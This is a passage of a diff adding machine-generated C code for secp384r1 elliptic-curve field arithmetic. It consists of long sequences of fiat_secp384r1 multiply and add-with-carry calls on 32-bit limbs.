fiat_secp384r1_addcarryx_u32(&x425, &x426, 0x0, x422, x419); ++ fiat_secp384r1_addcarryx_u32(&x427, &x428, x426, x420, x417); ++ fiat_secp384r1_addcarryx_u32(&x429, &x430, x428, x418, x415); ++ fiat_secp384r1_addcarryx_u32(&x431, &x432, x430, x416, x413); ++ fiat_secp384r1_addcarryx_u32(&x433, &x434, x432, x414, x411); ++ fiat_secp384r1_addcarryx_u32(&x435, &x436, x434, x412, x409); ++ fiat_secp384r1_addcarryx_u32(&x437, &x438, x436, x410, x407); ++ fiat_secp384r1_addcarryx_u32(&x439, &x440, x438, x408, x405); ++ fiat_secp384r1_addcarryx_u32(&x441, &x442, 0x0, x381, x423); ++ fiat_secp384r1_addcarryx_u32(&x443, &x444, x442, x383, x424); ++ fiat_secp384r1_addcarryx_u32(&x445, &x446, x444, x385, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x447, &x448, x446, x387, x421); ++ fiat_secp384r1_addcarryx_u32(&x449, &x450, x448, x389, x425); ++ fiat_secp384r1_addcarryx_u32(&x451, &x452, x450, x391, x427); ++ fiat_secp384r1_addcarryx_u32(&x453, &x454, x452, x393, x429); ++ fiat_secp384r1_addcarryx_u32(&x455, &x456, x454, x395, x431); ++ fiat_secp384r1_addcarryx_u32(&x457, &x458, x456, x397, x433); ++ fiat_secp384r1_addcarryx_u32(&x459, &x460, x458, x399, x435); ++ fiat_secp384r1_addcarryx_u32(&x461, &x462, x460, x401, x437); ++ fiat_secp384r1_addcarryx_u32(&x463, &x464, x462, x403, x439); ++ fiat_secp384r1_addcarryx_u32(&x465, &x466, x464, ((uint32_t)x404 + x370), ++ (x440 + x406)); ++ fiat_secp384r1_mulx_u32(&x467, &x468, x5, 0x2); ++ fiat_secp384r1_mulx_u32(&x469, &x470, x5, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x471, &x472, x5, 0x2); ++ fiat_secp384r1_mulx_u32(&x473, &x474, x5, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_addcarryx_u32(&x475, &x476, 0x0, (fiat_secp384r1_uint1)x468, ++ x5); ++ fiat_secp384r1_addcarryx_u32(&x477, &x478, 0x0, x443, x5); ++ fiat_secp384r1_addcarryx_u32(&x479, &x480, x478, x445, x473); ++ fiat_secp384r1_addcarryx_u32(&x481, &x482, x480, x447, x474); ++ fiat_secp384r1_addcarryx_u32(&x483, &x484, x482, x449, x471); ++ fiat_secp384r1_addcarryx_u32(&x485, &x486, x484, x451, ++ (fiat_secp384r1_uint1)x472); ++ fiat_secp384r1_addcarryx_u32(&x487, &x488, x486, x453, x469); ++ fiat_secp384r1_addcarryx_u32(&x489, &x490, x488, x455, x470); ++ fiat_secp384r1_addcarryx_u32(&x491, &x492, x490, x457, x467); ++ fiat_secp384r1_addcarryx_u32(&x493, &x494, x492, x459, x475); ++ fiat_secp384r1_addcarryx_u32(&x495, &x496, x494, x461, x476); ++ fiat_secp384r1_addcarryx_u32(&x497, &x498, x496, x463, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x499, &x500, x498, x465, 0x0); ++ fiat_secp384r1_mulx_u32(&x501, &x502, x477, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x503, &x504, x477, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x505, &x506, x477, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x507, &x508, x477, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x509, &x510, x477, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x511, &x512, x477, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x513, &x514, x477, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x515, &x516, x477, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x517, &x518, x477, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x519, &x520, x477, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u32(&x521, &x522, 0x0, x518, x515); ++ fiat_secp384r1_addcarryx_u32(&x523, &x524, x522, x516, x513); ++ fiat_secp384r1_addcarryx_u32(&x525, &x526, x524, x514, x511); ++ fiat_secp384r1_addcarryx_u32(&x527, &x528, x526, x512, x509); ++ fiat_secp384r1_addcarryx_u32(&x529, &x530, x528, x510, x507); ++ fiat_secp384r1_addcarryx_u32(&x531, &x532, x530, x508, x505); ++ fiat_secp384r1_addcarryx_u32(&x533, &x534, x532, x506, x503); ++ fiat_secp384r1_addcarryx_u32(&x535, &x536, x534, x504, x501); ++ fiat_secp384r1_addcarryx_u32(&x537, &x538, 0x0, x477, x519); ++ fiat_secp384r1_addcarryx_u32(&x539, &x540, x538, x479, x520); ++ fiat_secp384r1_addcarryx_u32(&x541, &x542, x540, x481, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x543, &x544, x542, x483, x517); ++ fiat_secp384r1_addcarryx_u32(&x545, &x546, x544, x485, x521); ++ fiat_secp384r1_addcarryx_u32(&x547, &x548, x546, x487, x523); ++ fiat_secp384r1_addcarryx_u32(&x549, &x550, x548, x489, x525); ++ fiat_secp384r1_addcarryx_u32(&x551, &x552, x550, x491, x527); ++ fiat_secp384r1_addcarryx_u32(&x553, &x554, x552, x493, x529); ++ fiat_secp384r1_addcarryx_u32(&x555, &x556, x554, x495, x531); ++ fiat_secp384r1_addcarryx_u32(&x557, &x558, x556, x497, x533); ++ fiat_secp384r1_addcarryx_u32(&x559, &x560, x558, x499, x535); ++ fiat_secp384r1_addcarryx_u32(&x561, &x562, x560, ((uint32_t)x500 + x466), ++ (x536 + x502)); ++ fiat_secp384r1_mulx_u32(&x563, &x564, x6, 0x2); ++ fiat_secp384r1_mulx_u32(&x565, &x566, x6, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x567, &x568, x6, 0x2); ++ fiat_secp384r1_mulx_u32(&x569, &x570, x6, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_addcarryx_u32(&x571, &x572, 0x0, (fiat_secp384r1_uint1)x564, ++ x6); ++ fiat_secp384r1_addcarryx_u32(&x573, &x574, 0x0, x539, x6); ++ fiat_secp384r1_addcarryx_u32(&x575, &x576, x574, x541, x569); ++ fiat_secp384r1_addcarryx_u32(&x577, &x578, x576, x543, x570); ++ fiat_secp384r1_addcarryx_u32(&x579, &x580, x578, x545, x567); ++ fiat_secp384r1_addcarryx_u32(&x581, &x582, x580, x547, ++ (fiat_secp384r1_uint1)x568); ++ fiat_secp384r1_addcarryx_u32(&x583, &x584, x582, x549, x565); ++ fiat_secp384r1_addcarryx_u32(&x585, &x586, x584, x551, x566); ++ fiat_secp384r1_addcarryx_u32(&x587, &x588, x586, x553, x563); ++ fiat_secp384r1_addcarryx_u32(&x589, &x590, x588, x555, x571); ++ fiat_secp384r1_addcarryx_u32(&x591, &x592, x590, x557, x572); ++ fiat_secp384r1_addcarryx_u32(&x593, &x594, x592, x559, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x595, &x596, x594, x561, 0x0); ++ fiat_secp384r1_mulx_u32(&x597, &x598, x573, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x599, &x600, x573, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x601, &x602, x573, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x603, &x604, x573, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x605, &x606, x573, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x607, &x608, x573, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x609, &x610, x573, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x611, &x612, x573, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x613, &x614, x573, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x615, &x616, x573, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u32(&x617, &x618, 0x0, x614, x611); ++ fiat_secp384r1_addcarryx_u32(&x619, &x620, x618, x612, x609); ++ fiat_secp384r1_addcarryx_u32(&x621, &x622, x620, x610, x607); ++ fiat_secp384r1_addcarryx_u32(&x623, &x624, x622, x608, x605); ++ fiat_secp384r1_addcarryx_u32(&x625, &x626, x624, x606, x603); ++ fiat_secp384r1_addcarryx_u32(&x627, &x628, x626, x604, x601); ++ fiat_secp384r1_addcarryx_u32(&x629, &x630, x628, x602, x599); ++ fiat_secp384r1_addcarryx_u32(&x631, &x632, x630, x600, x597); ++ fiat_secp384r1_addcarryx_u32(&x633, &x634, 0x0, x573, x615); ++ fiat_secp384r1_addcarryx_u32(&x635, &x636, x634, x575, x616); ++ fiat_secp384r1_addcarryx_u32(&x637, &x638, x636, x577, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x639, &x640, x638, x579, x613); ++ fiat_secp384r1_addcarryx_u32(&x641, &x642, x640, x581, x617); ++ fiat_secp384r1_addcarryx_u32(&x643, &x644, x642, x583, x619); ++ fiat_secp384r1_addcarryx_u32(&x645, &x646, x644, x585, x621); ++ fiat_secp384r1_addcarryx_u32(&x647, &x648, x646, x587, x623); ++ fiat_secp384r1_addcarryx_u32(&x649, &x650, x648, x589, x625); ++ fiat_secp384r1_addcarryx_u32(&x651, &x652, x650, x591, x627); ++ fiat_secp384r1_addcarryx_u32(&x653, &x654, x652, x593, x629); ++ fiat_secp384r1_addcarryx_u32(&x655, &x656, x654, x595, x631); ++ fiat_secp384r1_addcarryx_u32(&x657, &x658, x656, ((uint32_t)x596 + x562), ++ (x632 + x598)); ++ fiat_secp384r1_mulx_u32(&x659, &x660, x7, 0x2); ++ fiat_secp384r1_mulx_u32(&x661, &x662, x7, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x663, &x664, x7, 0x2); ++ fiat_secp384r1_mulx_u32(&x665, &x666, x7, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_addcarryx_u32(&x667, &x668, 0x0, (fiat_secp384r1_uint1)x660, ++ x7); ++ fiat_secp384r1_addcarryx_u32(&x669, &x670, 0x0, x635, x7); ++ fiat_secp384r1_addcarryx_u32(&x671, &x672, x670, x637, x665); ++ fiat_secp384r1_addcarryx_u32(&x673, &x674, x672, x639, x666); ++ fiat_secp384r1_addcarryx_u32(&x675, &x676, x674, x641, x663); ++ fiat_secp384r1_addcarryx_u32(&x677, &x678, x676, x643, ++ (fiat_secp384r1_uint1)x664); ++ fiat_secp384r1_addcarryx_u32(&x679, &x680, x678, x645, x661); ++ fiat_secp384r1_addcarryx_u32(&x681, &x682, x680, x647, x662); ++ fiat_secp384r1_addcarryx_u32(&x683, &x684, x682, x649, x659); ++ fiat_secp384r1_addcarryx_u32(&x685, &x686, x684, x651, x667); ++ fiat_secp384r1_addcarryx_u32(&x687, &x688, x686, x653, x668); ++ fiat_secp384r1_addcarryx_u32(&x689, &x690, x688, x655, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x691, &x692, x690, x657, 0x0); ++ fiat_secp384r1_mulx_u32(&x693, &x694, x669, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x695, &x696, x669, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x697, &x698, x669, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x699, &x700, x669, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x701, &x702, x669, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x703, &x704, x669, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x705, &x706, x669, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x707, &x708, x669, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x709, &x710, x669, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x711, &x712, x669, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u32(&x713, &x714, 0x0, x710, x707); ++ fiat_secp384r1_addcarryx_u32(&x715, &x716, x714, x708, x705); ++ fiat_secp384r1_addcarryx_u32(&x717, &x718, x716, x706, x703); ++ fiat_secp384r1_addcarryx_u32(&x719, &x720, x718, x704, x701); ++ fiat_secp384r1_addcarryx_u32(&x721, &x722, x720, x702, x699); ++ fiat_secp384r1_addcarryx_u32(&x723, &x724, x722, x700, x697); ++ fiat_secp384r1_addcarryx_u32(&x725, &x726, x724, x698, x695); ++ fiat_secp384r1_addcarryx_u32(&x727, &x728, x726, x696, x693); ++ fiat_secp384r1_addcarryx_u32(&x729, &x730, 0x0, x669, x711); ++ fiat_secp384r1_addcarryx_u32(&x731, &x732, x730, x671, x712); ++ fiat_secp384r1_addcarryx_u32(&x733, &x734, x732, x673, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x735, &x736, x734, x675, x709); ++ fiat_secp384r1_addcarryx_u32(&x737, &x738, x736, x677, x713); ++ fiat_secp384r1_addcarryx_u32(&x739, &x740, x738, x679, x715); ++ fiat_secp384r1_addcarryx_u32(&x741, &x742, x740, x681, x717); ++ fiat_secp384r1_addcarryx_u32(&x743, &x744, x742, x683, x719); ++ fiat_secp384r1_addcarryx_u32(&x745, &x746, x744, x685, x721); ++ fiat_secp384r1_addcarryx_u32(&x747, &x748, x746, x687, x723); ++ fiat_secp384r1_addcarryx_u32(&x749, &x750, x748, x689, x725); ++ fiat_secp384r1_addcarryx_u32(&x751, &x752, x750, x691, x727); ++ fiat_secp384r1_addcarryx_u32(&x753, &x754, x752, ((uint32_t)x692 + x658), ++ (x728 + x694)); ++ fiat_secp384r1_mulx_u32(&x755, &x756, x8, 0x2); ++ fiat_secp384r1_mulx_u32(&x757, &x758, x8, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x759, &x760, x8, 0x2); ++ fiat_secp384r1_mulx_u32(&x761, &x762, x8, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_addcarryx_u32(&x763, &x764, 0x0, (fiat_secp384r1_uint1)x756, ++ x8); ++ fiat_secp384r1_addcarryx_u32(&x765, &x766, 0x0, x731, x8); ++ fiat_secp384r1_addcarryx_u32(&x767, &x768, x766, x733, x761); ++ fiat_secp384r1_addcarryx_u32(&x769, &x770, x768, x735, x762); ++ fiat_secp384r1_addcarryx_u32(&x771, &x772, x770, x737, x759); ++ fiat_secp384r1_addcarryx_u32(&x773, &x774, x772, x739, ++ (fiat_secp384r1_uint1)x760); ++ fiat_secp384r1_addcarryx_u32(&x775, &x776, x774, x741, x757); ++ fiat_secp384r1_addcarryx_u32(&x777, &x778, x776, x743, x758); ++ fiat_secp384r1_addcarryx_u32(&x779, &x780, x778, x745, x755); ++ fiat_secp384r1_addcarryx_u32(&x781, &x782, x780, x747, x763); ++ fiat_secp384r1_addcarryx_u32(&x783, &x784, x782, x749, x764); ++ fiat_secp384r1_addcarryx_u32(&x785, &x786, x784, x751, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x787, &x788, x786, x753, 0x0); ++ fiat_secp384r1_mulx_u32(&x789, &x790, x765, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x791, &x792, x765, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x793, &x794, x765, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x795, &x796, x765, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x797, &x798, x765, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x799, &x800, x765, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x801, &x802, x765, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x803, &x804, x765, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x805, &x806, x765, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x807, &x808, x765, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u32(&x809, &x810, 0x0, x806, x803); ++ fiat_secp384r1_addcarryx_u32(&x811, &x812, x810, x804, x801); ++ fiat_secp384r1_addcarryx_u32(&x813, &x814, x812, x802, x799); ++ fiat_secp384r1_addcarryx_u32(&x815, &x816, x814, x800, x797); ++ fiat_secp384r1_addcarryx_u32(&x817, &x818, x816, x798, x795); ++ fiat_secp384r1_addcarryx_u32(&x819, &x820, x818, x796, x793); ++ fiat_secp384r1_addcarryx_u32(&x821, &x822, x820, x794, x791); ++ fiat_secp384r1_addcarryx_u32(&x823, &x824, x822, x792, x789); ++ fiat_secp384r1_addcarryx_u32(&x825, &x826, 0x0, x765, x807); ++ fiat_secp384r1_addcarryx_u32(&x827, &x828, x826, x767, x808); ++ fiat_secp384r1_addcarryx_u32(&x829, &x830, x828, x769, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x831, &x832, x830, x771, x805); ++ fiat_secp384r1_addcarryx_u32(&x833, &x834, x832, x773, x809); ++ fiat_secp384r1_addcarryx_u32(&x835, &x836, x834, x775, x811); ++ fiat_secp384r1_addcarryx_u32(&x837, &x838, x836, x777, x813); ++ fiat_secp384r1_addcarryx_u32(&x839, &x840, x838, x779, x815); ++ fiat_secp384r1_addcarryx_u32(&x841, &x842, x840, x781, x817); ++ fiat_secp384r1_addcarryx_u32(&x843, &x844, x842, x783, x819); ++ fiat_secp384r1_addcarryx_u32(&x845, &x846, x844, x785, x821); ++ fiat_secp384r1_addcarryx_u32(&x847, &x848, x846, x787, x823); ++ fiat_secp384r1_addcarryx_u32(&x849, &x850, x848, ((uint32_t)x788 + x754), ++ (x824 + x790)); ++ fiat_secp384r1_mulx_u32(&x851, &x852, x9, 0x2); ++ fiat_secp384r1_mulx_u32(&x853, &x854, x9, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x855, &x856, x9, 0x2); ++ fiat_secp384r1_mulx_u32(&x857, &x858, x9, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_addcarryx_u32(&x859, &x860, 0x0, (fiat_secp384r1_uint1)x852, ++ x9); ++ fiat_secp384r1_addcarryx_u32(&x861, &x862, 0x0, x827, x9); ++ fiat_secp384r1_addcarryx_u32(&x863, &x864, x862, x829, x857); ++ fiat_secp384r1_addcarryx_u32(&x865, &x866, x864, x831, x858); ++ fiat_secp384r1_addcarryx_u32(&x867, &x868, x866, x833, x855); ++ fiat_secp384r1_addcarryx_u32(&x869, &x870, x868, x835, ++ (fiat_secp384r1_uint1)x856); ++ fiat_secp384r1_addcarryx_u32(&x871, &x872, x870, x837, x853); ++ fiat_secp384r1_addcarryx_u32(&x873, &x874, x872, x839, x854); ++ fiat_secp384r1_addcarryx_u32(&x875, &x876, x874, x841, x851); ++ fiat_secp384r1_addcarryx_u32(&x877, &x878, x876, x843, x859); ++ fiat_secp384r1_addcarryx_u32(&x879, &x880, x878, x845, x860); ++ fiat_secp384r1_addcarryx_u32(&x881, &x882, x880, x847, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x883, &x884, x882, x849, 0x0); ++ fiat_secp384r1_mulx_u32(&x885, &x886, x861, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x887, &x888, x861, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x889, &x890, x861, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x891, &x892, x861, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x893, &x894, x861, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x895, &x896, x861, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x897, &x898, x861, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x899, &x900, x861, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x901, &x902, x861, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x903, &x904, x861, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u32(&x905, &x906, 0x0, x902, x899); ++ fiat_secp384r1_addcarryx_u32(&x907, &x908, x906, x900, x897); ++ fiat_secp384r1_addcarryx_u32(&x909, &x910, x908, x898, x895); ++ fiat_secp384r1_addcarryx_u32(&x911, &x912, x910, x896, x893); ++ fiat_secp384r1_addcarryx_u32(&x913, &x914, x912, x894, x891); ++ fiat_secp384r1_addcarryx_u32(&x915, &x916, x914, x892, x889); ++ fiat_secp384r1_addcarryx_u32(&x917, &x918, x916, x890, x887); ++ fiat_secp384r1_addcarryx_u32(&x919, &x920, x918, x888, x885); ++ fiat_secp384r1_addcarryx_u32(&x921, &x922, 0x0, x861, x903); ++ fiat_secp384r1_addcarryx_u32(&x923, &x924, x922, x863, x904); ++ fiat_secp384r1_addcarryx_u32(&x925, &x926, x924, x865, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x927, &x928, x926, x867, x901); ++ fiat_secp384r1_addcarryx_u32(&x929, &x930, x928, x869, x905); ++ fiat_secp384r1_addcarryx_u32(&x931, &x932, x930, x871, x907); ++ fiat_secp384r1_addcarryx_u32(&x933, &x934, x932, x873, x909); ++ fiat_secp384r1_addcarryx_u32(&x935, &x936, x934, x875, x911); ++ fiat_secp384r1_addcarryx_u32(&x937, &x938, x936, x877, x913); ++ fiat_secp384r1_addcarryx_u32(&x939, &x940, x938, x879, x915); ++ fiat_secp384r1_addcarryx_u32(&x941, &x942, x940, x881, x917); ++ fiat_secp384r1_addcarryx_u32(&x943, &x944, x942, x883, x919); ++ fiat_secp384r1_addcarryx_u32(&x945, &x946, x944, ((uint32_t)x884 + x850), ++ (x920 + x886)); ++ fiat_secp384r1_mulx_u32(&x947, &x948, x10, 0x2); ++ fiat_secp384r1_mulx_u32(&x949, &x950, x10, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x951, &x952, x10, 0x2); ++ fiat_secp384r1_mulx_u32(&x953, &x954, x10, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_addcarryx_u32(&x955, &x956, 0x0, (fiat_secp384r1_uint1)x948, ++ x10); ++ fiat_secp384r1_addcarryx_u32(&x957, &x958, 0x0, x923, x10); ++ fiat_secp384r1_addcarryx_u32(&x959, &x960, x958, x925, x953); ++ fiat_secp384r1_addcarryx_u32(&x961, &x962, x960, x927, x954); ++ fiat_secp384r1_addcarryx_u32(&x963, &x964, x962, x929, x951); ++ fiat_secp384r1_addcarryx_u32(&x965, &x966, x964, x931, ++ (fiat_secp384r1_uint1)x952); ++ fiat_secp384r1_addcarryx_u32(&x967, &x968, x966, x933, x949); ++ fiat_secp384r1_addcarryx_u32(&x969, &x970, x968, x935, x950); ++ fiat_secp384r1_addcarryx_u32(&x971, &x972, x970, x937, x947); ++ fiat_secp384r1_addcarryx_u32(&x973, &x974, x972, x939, x955); ++ fiat_secp384r1_addcarryx_u32(&x975, &x976, x974, x941, x956); ++ fiat_secp384r1_addcarryx_u32(&x977, &x978, x976, x943, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x979, &x980, x978, x945, 0x0); ++ fiat_secp384r1_mulx_u32(&x981, &x982, x957, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x983, &x984, x957, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x985, &x986, x957, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x987, &x988, x957, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x989, &x990, x957, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x991, &x992, x957, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x993, &x994, x957, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x995, &x996, x957, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x997, &x998, x957, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x999, &x1000, x957, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u32(&x1001, &x1002, 0x0, x998, x995); ++ fiat_secp384r1_addcarryx_u32(&x1003, &x1004, x1002, x996, x993); ++ fiat_secp384r1_addcarryx_u32(&x1005, &x1006, x1004, x994, x991); ++ fiat_secp384r1_addcarryx_u32(&x1007, &x1008, x1006, x992, x989); ++ fiat_secp384r1_addcarryx_u32(&x1009, &x1010, x1008, x990, x987); ++ fiat_secp384r1_addcarryx_u32(&x1011, &x1012, x1010, x988, x985); ++ fiat_secp384r1_addcarryx_u32(&x1013, &x1014, x1012, x986, x983); ++ fiat_secp384r1_addcarryx_u32(&x1015, &x1016, x1014, x984, x981); ++ fiat_secp384r1_addcarryx_u32(&x1017, &x1018, 0x0, x957, x999); ++ fiat_secp384r1_addcarryx_u32(&x1019, &x1020, x1018, x959, x1000); ++ fiat_secp384r1_addcarryx_u32(&x1021, &x1022, x1020, x961, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x1023, &x1024, x1022, x963, x997); ++ fiat_secp384r1_addcarryx_u32(&x1025, &x1026, x1024, x965, x1001); ++ fiat_secp384r1_addcarryx_u32(&x1027, &x1028, x1026, x967, x1003); ++ fiat_secp384r1_addcarryx_u32(&x1029, &x1030, x1028, x969, x1005); ++ fiat_secp384r1_addcarryx_u32(&x1031, &x1032, x1030, x971, x1007); ++ fiat_secp384r1_addcarryx_u32(&x1033, &x1034, x1032, x973, x1009); ++ fiat_secp384r1_addcarryx_u32(&x1035, &x1036, x1034, x975, x1011); ++ fiat_secp384r1_addcarryx_u32(&x1037, &x1038, x1036, x977, x1013); ++ fiat_secp384r1_addcarryx_u32(&x1039, &x1040, x1038, x979, x1015); ++ fiat_secp384r1_addcarryx_u32(&x1041, &x1042, x1040, ((uint32_t)x980 + x946), ++ (x1016 + x982)); ++ fiat_secp384r1_mulx_u32(&x1043, &x1044, x11, 0x2); ++ fiat_secp384r1_mulx_u32(&x1045, &x1046, x11, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x1047, &x1048, x11, 0x2); ++ fiat_secp384r1_mulx_u32(&x1049, &x1050, x11, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_addcarryx_u32(&x1051, &x1052, 0x0, ++ (fiat_secp384r1_uint1)x1044, x11); ++ fiat_secp384r1_addcarryx_u32(&x1053, &x1054, 0x0, x1019, x11); ++ fiat_secp384r1_addcarryx_u32(&x1055, &x1056, x1054, x1021, x1049); ++ fiat_secp384r1_addcarryx_u32(&x1057, &x1058, x1056, x1023, x1050); ++ fiat_secp384r1_addcarryx_u32(&x1059, &x1060, x1058, x1025, x1047); ++ fiat_secp384r1_addcarryx_u32(&x1061, &x1062, x1060, x1027, ++ (fiat_secp384r1_uint1)x1048); ++ fiat_secp384r1_addcarryx_u32(&x1063, &x1064, x1062, x1029, x1045); ++ fiat_secp384r1_addcarryx_u32(&x1065, &x1066, x1064, x1031, x1046); ++ fiat_secp384r1_addcarryx_u32(&x1067, &x1068, x1066, x1033, x1043); ++ fiat_secp384r1_addcarryx_u32(&x1069, &x1070, x1068, x1035, x1051); ++ fiat_secp384r1_addcarryx_u32(&x1071, &x1072, x1070, x1037, x1052); ++ fiat_secp384r1_addcarryx_u32(&x1073, &x1074, x1072, x1039, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x1075, &x1076, x1074, x1041, 0x0); ++ fiat_secp384r1_mulx_u32(&x1077, &x1078, x1053, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1079, &x1080, x1053, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1081, &x1082, x1053, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1083, &x1084, x1053, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1085, &x1086, x1053, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1087, &x1088, x1053, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1089, &x1090, x1053, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1091, &x1092, x1053, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x1093, &x1094, x1053, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x1095, &x1096, x1053, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u32(&x1097, &x1098, 0x0, x1094, x1091); ++ fiat_secp384r1_addcarryx_u32(&x1099, &x1100, x1098, x1092, x1089); ++ fiat_secp384r1_addcarryx_u32(&x1101, &x1102, x1100, x1090, x1087); ++ fiat_secp384r1_addcarryx_u32(&x1103, &x1104, x1102, x1088, x1085); ++ fiat_secp384r1_addcarryx_u32(&x1105, &x1106, x1104, x1086, x1083); ++ fiat_secp384r1_addcarryx_u32(&x1107, &x1108, x1106, x1084, x1081); ++ fiat_secp384r1_addcarryx_u32(&x1109, &x1110, x1108, x1082, x1079); ++ fiat_secp384r1_addcarryx_u32(&x1111, &x1112, x1110, x1080, x1077); ++ fiat_secp384r1_addcarryx_u32(&x1113, &x1114, 0x0, x1053, x1095); ++ fiat_secp384r1_addcarryx_u32(&x1115, &x1116, x1114, x1055, x1096); ++ fiat_secp384r1_addcarryx_u32(&x1117, &x1118, x1116, x1057, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x1119, &x1120, x1118, x1059, x1093); ++ fiat_secp384r1_addcarryx_u32(&x1121, &x1122, x1120, x1061, x1097); ++ fiat_secp384r1_addcarryx_u32(&x1123, &x1124, x1122, x1063, x1099); ++ fiat_secp384r1_addcarryx_u32(&x1125, &x1126, x1124, x1065, x1101); 